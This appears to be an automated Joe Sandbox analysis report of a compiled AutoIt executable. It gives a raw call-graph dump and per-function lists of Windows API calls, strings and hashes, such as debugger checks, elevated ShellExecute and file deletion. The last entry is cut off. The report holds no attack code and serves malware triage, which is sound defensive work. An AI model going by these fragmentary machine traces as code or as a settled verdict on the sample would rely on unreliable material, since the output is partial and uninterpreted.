SetCurrentDirectoryW 100358 1a3c87 Mailbox 100355->100358 100358->100274 100359 1dd4d7 100364 1dd4ed SetCurrentDirectoryW 100359->100364 100364->100358 100383->100355 100397->100336 100398->100341 100399->100343 100401 1a77c7 59 API calls 100400->100401 100402 1a378e 100401->100402 100601 1a3d43 100402->100601 100404 1a37ac 100405 1a4864 61 API calls 100404->100405 100406 1a37c0 100405->100406 100407 1a7f41 59 API calls 100406->100407 100408 1a37cd 100407->100408 100409 1a4f3d 136 API calls 100408->100409 100410 1a37e6 100409->100410 100411 1dd3ae 100410->100411 100412 1a37ee Mailbox 100410->100412 100643 2097e5 100411->100643 100415 1a81a7 59 API calls 100412->100415 100419 1a3801 100415->100419 100416 1dd3cd 100418 1c2f95 _free 58 API calls 100416->100418 100417 1a4faa 84 API calls 100417->100416 100420 1dd3da 100418->100420 100615 1a93ea 100419->100615 100422 1a4faa 84 API calls 100420->100422 100424 1dd3e3 100422->100424 100428 1a3ee2 59 API calls 100424->100428 100425 1a7f41 59 API calls 100426 1a381a 100425->100426 100427 1a8620 69 API calls 100426->100427 100429 1a382c Mailbox 100427->100429 100430 1dd3fe 100428->100430 100431 1a7f41 59 API calls 100429->100431 100432 1a3ee2 59 API calls 100430->100432 100433 1a3852 100431->100433 100435 1dd41a 100432->100435 100434 1a8620 69 API calls 100433->100434 100438 1a3861 Mailbox 100434->100438 100436 1a4864 61 API calls 100435->100436 100437 1dd43f 100436->100437 100439 1a3ee2 59 API calls 100437->100439 100441 1a77c7 59 API calls 100438->100441 100440 1dd44b 100439->100440 100442 1a81a7 59 API calls 100440->100442 100443 1a387f 100441->100443 100444 1dd459 100442->100444 100618 1a3ee2 100443->100618 100446 1a3ee2 59 API calls 100444->100446 100448 1dd468 100446->100448 100454 1a81a7 59 API calls 100448->100454 100450 1a3899 100450->100424 100451 1a38a3 100450->100451 100452 1c313d _W_store_winword 60 API calls 100451->100452 100453 1a38ae 100452->100453 100453->100430 100455 1a38b8 100453->100455 100457 1dd48a 100454->100457 100456 1c313d _W_store_winword 60 API calls 100455->100456 100459 1a38c3 100456->100459 100458 1a3ee2 59 API calls 100457->100458 100460 1dd497 100458->100460 100459->100435 100461 1a38cd 100459->100461 100460->100460 100462 1c313d _W_store_winword 60 API calls 100461->100462 100463 1a38d8 100462->100463 100463->100448 100464 1a3919 100463->100464 100466 1a3ee2 59 API calls 100463->100466 100464->100448 100465 1a3926 100464->100465 100468 1a942e 59 API calls 100465->100468 100467 1a38fc 100466->100467 100470 1a81a7 59 API calls 100467->100470 100469 1a3936 100468->100469 100471 1a91b0 59 API calls 100469->100471 100472 1a390a 100470->100472 100473 1a3944 100471->100473 100474 1a3ee2 59 API calls 100472->100474 100634 1a9040 100473->100634 100474->100464 100476 1a93ea 59 API calls 100478 1a3961 100476->100478 100477 1a9040 60 API calls 100477->100478 100478->100476 100478->100477 100479 1a3ee2 59 API calls 100478->100479 100480 1a39a7 Mailbox 100478->100480 100479->100478 100480->100350 100482 1a73f2 __write_nolock 100481->100482 100483 1a740b 100482->100483 100484 1dee4b _memset 100482->100484 100485 1a48ae 60 API calls 100483->100485 100487 1dee67 GetOpenFileNameW 100484->100487 100486 1a7414 100485->100486 100683 1c09d5 100486->100683 100489 1deeb6 100487->100489 100599->100359 100602 1a3d50 __write_nolock 100601->100602 100603 1a7d2c 59 API calls 100602->100603 100607 1a3eb6 Mailbox 100602->100607 100604 1a3d82 100603->100604 100605 1a7b52 59 API calls 100604->100605 100613 1a3db8 Mailbox 100604->100613 100605->100604 100606 1a3e89 100606->100607 100608 1a7f41 59 API calls 100606->100608 100607->100404 100610 1a3eaa 100608->100610 100609 1a7f41 59 API calls 100609->100613 100612 1a3f84 59 API calls 100610->100612 100611 1a7b52 59 API calls 100611->100613 100612->100607 100613->100606 100613->100607 100613->100609 100613->100611 100614 1a3f84 59 API calls 100613->100614 100614->100613 100616 1c0ff6 Mailbox 59 API calls 100615->100616 100617 1a380d 100616->100617 100617->100425 100619 1a3eec 100618->100619 100620 1a3f05 100618->100620 100621 1a81a7 59 API calls 100619->100621 100622 1a7d2c 59 API calls 100620->100622 100623 1a388b 100621->100623 100622->100623 100624 1c313d 100623->100624 100625 1c31be 100624->100625 100626 1c3149 100624->100626 100680 1c31d0 60 API calls 3 library calls 100625->100680 100633 1c316e 100626->100633 100678 1c8d68 58 API calls __getptd_noexit 100626->100678 100629 1c31cb 100629->100450 100630 1c3155 100679 1c8ff6 9 API calls __lseeki64 100630->100679 100632 1c3160 100632->100450 100633->100450 100635 1df5a5 100634->100635 100637 1a9057 100634->100637 100635->100637 100682 1a8d3b 59 API calls Mailbox 100635->100682 100638 1a915f 100637->100638 100639 1a9158 100637->100639 100640 1a91a0 100637->100640 100638->100478 100642 1c0ff6 Mailbox 59 API calls 100639->100642 100681 1a9e9c 60 API calls Mailbox 100640->100681 100642->100638 100644 1a5045 85 API calls 100643->100644 100645 209854 100644->100645 100646 2099be 96 API calls 100645->100646 100647 209866 100646->100647 100648 1a506b 74 API calls 100647->100648 100677 1dd3c1 100647->100677 100649 209881 100648->100649 100650 1a506b 74 API calls 100649->100650 100651 209891 100650->100651 100652 1a506b 74 API calls 100651->100652 100653 2098ac 100652->100653 100654 1a506b 74 API calls 100653->100654 100655 2098c7 100654->100655 100656 1a5045 85 API calls 100655->100656 100657 2098de 100656->100657 100658 1c594c __malloc_crt 58 API calls 100657->100658 100659 2098e5 100658->100659 100660 1c594c __malloc_crt 58 API calls 100659->100660 100661 2098ef 100660->100661 100662 1a506b 74 API calls 100661->100662 100663 209903 100662->100663 100664 209393 GetSystemTimeAsFileTime 100663->100664 100665 209916 100664->100665 100666 209940 100665->100666 100667 20992b 100665->100667 100668 2099a5 100666->100668 100669 209946 100666->100669 100670 1c2f95 _free 58 API calls 100667->100670 100672 1c2f95 _free 58 API calls 100668->100672 100671 208d90 116 API calls 100669->100671 100673 209931 100670->100673 100674 20999d 100671->100674 100672->100677 100675 1c2f95 _free 58 API calls 100673->100675 100676 1c2f95 _free 58 API calls 100674->100676 100675->100677 100676->100677 100677->100416 100677->100417 100678->100630 100679->100632 100680->100629 100681->100638 100682->100637

                                                            Executed Functions

                                                            Function 001A3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A3B7A
                                                            • IsDebuggerPresent.KERNEL32 ref: 001A3B8C
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,002662F8,002662E0,?,?), ref: 001A3BFD
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001B0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001A3C26,002662F8,?,?,?), ref: 001B0ACE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001A3C81
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002593F0,00000010), ref: 001DD4BC
                                                            • SetCurrentDirectoryW.KERNEL32(?,002662F8,?,?,?), ref: 001DD4F4
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00255D40,002662F8,?,?,?), ref: 001DD57A
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 001DD581
                                                              • Part of subcall function 001A3A58: GetSysColorBrush.USER32(0000000F), ref: 001A3A62
                                                              • Part of subcall function 001A3A58: LoadCursorW.USER32(00000000,00007F00), ref: 001A3A71
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(00000063), ref: 001A3A88
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(000000A4), ref: 001A3A9A
                                                              • Part of subcall function 001A3A58: LoadIconW.USER32(000000A2), ref: 001A3AAC
                                                              • Part of subcall function 001A3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001A3AD2
                                                              • Part of subcall function 001A3A58: RegisterClassExW.USER32(?), ref: 001A3B28
                                                              • Part of subcall function 001A39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001A3A15
                                                              • Part of subcall function 001A39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001A3A36
                                                              • Part of subcall function 001A39E7: ShowWindow.USER32(00000000,?,?), ref: 001A3A4A
                                                              • Part of subcall function 001A39E7: ShowWindow.USER32(00000000,?,?), ref: 001A3A53
                                                              • Part of subcall function 001A43DB: _memset.LIBCMT ref: 001A4401
                                                              • Part of subcall function 001A43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A44A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%#
                                                            • API String ID: 529118366-170307975
                                                            • Opcode ID: ba167f986ff20a35952e60641230867589e5c7e3011233b31d301ec26913608d
                                                            • Instruction ID: 6d4b4f263a8af0c7947f6a5766823bed959dfb1d7e6709555f0a9669deef3551
                                                            • Opcode Fuzzy Hash: ba167f986ff20a35952e60641230867589e5c7e3011233b31d301ec26913608d
                                                            • Instruction Fuzzy Hash: F951E638904248BECF11EBF4FC1DEED7B79AB56710F0081A6F861A21A1DBB45746CB61
                                                            Function 001A4AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1037 1a4afe-1a4b5e call 1a77c7 GetVersionExW call 1a7d2c 1042 1a4c69-1a4c6b 1037->1042 1043 1a4b64 1037->1043 1044 1ddb90-1ddb9c 1042->1044 1045 1a4b67-1a4b6c 1043->1045 1046 1ddb9d-1ddba1 1044->1046 1047 1a4b72 1045->1047 1048 1a4c70-1a4c71 1045->1048 1050 1ddba4-1ddbb0 1046->1050 1051 1ddba3 1046->1051 1049 1a4b73-1a4baa call 1a7e8c call 1a7886 1047->1049 1048->1049 1059 1ddc8d-1ddc90 1049->1059 1060 1a4bb0-1a4bb1 1049->1060 1050->1046 1053 1ddbb2-1ddbb7 1050->1053 1051->1050 1053->1045 1055 1ddbbd-1ddbc4 1053->1055 1055->1044 1057 1ddbc6 1055->1057 1061 1ddbcb-1ddbce 1057->1061 1062 1ddca9-1ddcad 1059->1062 1063 1ddc92 1059->1063 1060->1061 1064 1a4bb7-1a4bc2 1060->1064 1065 1ddbd4-1ddbf2 1061->1065 1066 1a4bf1-1a4c08 GetCurrentProcess IsWow64Process 1061->1066 1071 1ddcaf-1ddcb8 1062->1071 1072 1ddc98-1ddca1 1062->1072 1067 1ddc95 1063->1067 1068 1a4bc8-1a4bca 1064->1068 1069 1ddc13-1ddc19 1064->1069 1065->1066 1070 1ddbf8-1ddbfe 1065->1070 1073 1a4c0a 1066->1073 1074 1a4c0d-1a4c1e 1066->1074 1067->1072 1075 1ddc2e-1ddc3a 1068->1075 1076 1a4bd0-1a4bd3 1068->1076 1079 1ddc1b-1ddc1e 1069->1079 1080 1ddc23-1ddc29 1069->1080 1077 1ddc08-1ddc0e 1070->1077 1078 1ddc00-1ddc03 1070->1078 1071->1067 1081 1ddcba-1ddcbd 1071->1081 1072->1062 1073->1074 1082 1a4c89-1a4c93 GetSystemInfo 1074->1082 1083 1a4c20-1a4c30 call 1a4c95 1074->1083 1087 1ddc3c-1ddc3f 1075->1087 1088 1ddc44-1ddc4a 1075->1088 1084 1a4bd9-1a4be8 1076->1084 1085 1ddc5a-1ddc5d 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1072 1086 1a4c56-1a4c66 1082->1086 1096 1a4c7d-1a4c87 GetSystemInfo 1083->1096 1097 1a4c32-1a4c3f call 1a4c95 1083->1097 1090 1ddc4f-1ddc55 1084->1090 1091 1a4bee 1084->1091 1085->1066 1093 1ddc63-1ddc78 1085->1093 1087->1066 1088->1066 1090->1066 1091->1066 1094 1ddc7a-1ddc7d 1093->1094 1095 1ddc82-1ddc88 1093->1095 1094->1066 1095->1066 1098 1a4c47-1a4c4b 1096->1098 1102 1a4c41-1a4c45 GetNativeSystemInfo 1097->1102 1103 1a4c76-1a4c7b 1097->1103 1098->1086 1101 1a4c4d-1a4c50 FreeLibrary 1098->1101 1101->1086 1102->1098 1103->1102
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 001A4B2B
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • GetCurrentProcess.KERNEL32(?,0022FAEC,00000000,00000000,?), ref: 001A4BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 001A4BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 001A4C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 001A4C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 001A4C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 001A4C8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 5a6fbcdd64394b4cf78d38c2abcbb46e4649772a5c63d42eedfa6ff5aca0ad11
                                                            • Instruction ID: 166ceac563b1314433f926ef719a2bc98cc35d646627d9be0e4f378cfa65cb70
                                                            • Opcode Fuzzy Hash: 5a6fbcdd64394b4cf78d38c2abcbb46e4649772a5c63d42eedfa6ff5aca0ad11
                                                            • Instruction Fuzzy Hash: 5C91D23554ABC0DFC735CB7895511AABFE4AF6A300F484AAED0CA93B41D361E908C769
                                                            Function 001A4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1104 1a4fe9-1a5001 CreateStreamOnHGlobal 1105 1a5003-1a501a FindResourceExW 1104->1105 1106 1a5021-1a5026 1104->1106 1107 1ddd5c-1ddd6b LoadResource 1105->1107 1108 1a5020 1105->1108 1107->1108 1109 1ddd71-1ddd7f SizeofResource 1107->1109 1108->1106 1109->1108 1110 1ddd85-1ddd90 LockResource 1109->1110 1110->1108 1111 1ddd96-1dddb4 1110->1111 1111->1108
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001A4EEE,?,?,00000000,00000000), ref: 001A4FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001A4EEE,?,?,00000000,00000000), ref: 001A5010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F), ref: 001DDD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F), ref: 001DDD75
                                                            • LockResource.KERNEL32(001A4EEE,?,?,001A4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001A4F8F,00000000), ref: 001DDD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: e088a1a486187e351a5fb07cc78c3f4ade9cb6b0fa34a98e1e0d6b676d9e96da
                                                            • Instruction ID: ee5a40646aaf3117c9c0f03f10e5ea33dd2e9fcf9e2b5ed0fff7ee0443e47365
                                                            • Opcode Fuzzy Hash: e088a1a486187e351a5fb07cc78c3f4ade9cb6b0fa34a98e1e0d6b676d9e96da
                                                            • Instruction Fuzzy Hash: F4115E75200700BFD7318BA5ED58F6B7BBAEBCAB51F104278F90596260DB71E8018660
                                                            Function 001AE800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dt&$Dt&$Dt&$Dt&$Variable must be of type 'Object'.
                                                            • API String ID: 0-3633352189
                                                            • Opcode ID: 8ae48457d922bfc68b1bde33f10822c0df0be543eec56ffcc854c7fc8c518ab6
                                                            • Instruction ID: c9b731294d2dd5eff88b80c224643d45e8c0a5d49ab1203796f284191a25c5ad
                                                            • Opcode Fuzzy Hash: 8ae48457d922bfc68b1bde33f10822c0df0be543eec56ffcc854c7fc8c518ab6
                                                            • Instruction Fuzzy Hash: B8A2A178A04205CFCB24CF98C484AAEB7F2FF5A314F258069E916AB351D775ED42CB91
                                                            Function 00204696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,001DE7C1), ref: 002046A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 002046B7
                                                            • FindClose.KERNEL32(00000000), ref: 002046C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: b080cd5c26720fba936b1fe109e81c78184b2bdd875f6434c97bb894f02b5433
                                                            • Instruction ID: c5108ef0abc9d3e9ed129b71ea0b9e86cf8815d10ba962bc9e9436302e9058f2
                                                            • Opcode Fuzzy Hash: b080cd5c26720fba936b1fe109e81c78184b2bdd875f6434c97bb894f02b5433
                                                            • Instruction Fuzzy Hash: 18E0D871820501AB8320B778FD4D4EA776C9E07335F104725F935C14E0F7B059608595
                                                            Function 001B0B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B0BBB
                                                            • timeGetTime.WINMM ref: 001B0E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B0FB3
                                                            • TranslateMessage.USER32(?), ref: 001B0FC7
                                                            • DispatchMessageW.USER32(?), ref: 001B0FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 001B0FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 001B105A
                                                            • DestroyWindow.USER32 ref: 001B1066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001B1080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 001E52AD
                                                            • TranslateMessage.USER32(?), ref: 001E608A
                                                            • DispatchMessageW.USER32(?), ref: 001E6098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001E60AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr&$pr&$pr&$pr&
                                                            • API String ID: 4003667617-3414653626
                                                            • Opcode ID: d603500fc09813d851d7cd4eb625be5ce828888d8a1a58ac617e89e2311e4dc5
                                                            • Instruction ID: 04913ff2002df2b2a508f19b660160ebe2ce3961336e71a88f3112c36563fda0
                                                            • Opcode Fuzzy Hash: d603500fc09813d851d7cd4eb625be5ce828888d8a1a58ac617e89e2311e4dc5
                                                            • Instruction Fuzzy Hash: 21B2D470608B81DFD729DF24C894BAEB7E5BF95308F14491DF45A872A1DB70E884CB92
                                                            Function 002093DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 002091E9: __time64.LIBCMT ref: 002091F3
                                                              • Part of subcall function 001A5045: _fseek.LIBCMT ref: 001A505D
                                                            • __wsplitpath.LIBCMT ref: 002094BE
                                                              • Part of subcall function 001C432E: __wsplitpath_helper.LIBCMT ref: 001C436E
                                                            • _wcscpy.LIBCMT ref: 002094D1
                                                            • _wcscat.LIBCMT ref: 002094E4
                                                            • __wsplitpath.LIBCMT ref: 00209509
                                                            • _wcscat.LIBCMT ref: 0020951F
                                                            • _wcscat.LIBCMT ref: 00209532
                                                              • Part of subcall function 0020922F: _memmove.LIBCMT ref: 00209268
                                                              • Part of subcall function 0020922F: _memmove.LIBCMT ref: 00209277
                                                            • _wcscmp.LIBCMT ref: 00209479
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AAE
                                                              • Part of subcall function 002099BE: _wcscmp.LIBCMT ref: 00209AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002096DC
                                                            • _wcsncpy.LIBCMT ref: 0020974F
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00209785
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0020979B
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002097AC
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002097BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 5fb0f2873a833529d59dc7729608fc0083b54d12766f12e1e0effbfbd117ffbc
                                                            • Instruction ID: b0d6c25c0cc92a0dea2e99e33ed4b0c6f5b6ab6f4c17653dda12b19b0b54d6a0
                                                            • Opcode Fuzzy Hash: 5fb0f2873a833529d59dc7729608fc0083b54d12766f12e1e0effbfbd117ffbc
                                                            • Instruction Fuzzy Hash: 09C14DB1D10219ABCF21DF94CD85EDEB7BDAF55300F0040AAF609E7192DB709A948F65
                                                            Function 001A3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                            • RegisterClassExW.USER32(00000030), ref: 001A309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                            • LoadIconW.USER32(000000A9), ref: 001A30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 3fac4f14d5200589a06f2f0027360dbc57721fa9cf091b7df2bf469329a919c0
